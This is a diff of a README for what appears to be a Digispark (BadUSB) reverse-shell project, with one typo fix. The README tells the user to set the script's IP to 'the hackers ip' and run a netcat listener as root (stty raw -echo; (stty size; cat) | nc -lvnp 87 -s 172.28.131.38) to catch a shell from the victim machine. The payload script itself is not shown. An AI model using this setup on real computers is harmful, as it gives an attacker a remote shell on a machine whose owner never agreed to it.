ashwanthcreators/Digispark/README.md

 // This script contains ip address of 172.17.45.102 , change it to the hackers ip
 // 87 behind the ip is the port .
 You can change it to your desire in both the script here and the hackers opening port
-// enter the above command as root user in linux ---  stty raw -echo; (stty size; cat) | nc -lvnp 87 -s 172.28.131.38  --- (-s here is ip ) behind -lvnp is the port upload this script  in arduno
+// enter the above command as root user in linux ---  stty raw -echo; (stty size; cat) | nc -lvnp 87 -s 172.28.131.38  --- (-s here is ip ) behind -lvnp is the port upload this script  in arduino at digispark